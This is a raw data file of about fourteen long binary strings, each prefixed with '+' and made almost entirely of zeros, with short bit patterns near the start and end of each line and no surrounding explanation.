+111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011000000000000000000000000000000000001010110010011001111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000110110101011010111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000001111010101011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011001000110010011110111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010100110101011011111111111111111111111111111111111111111111111111 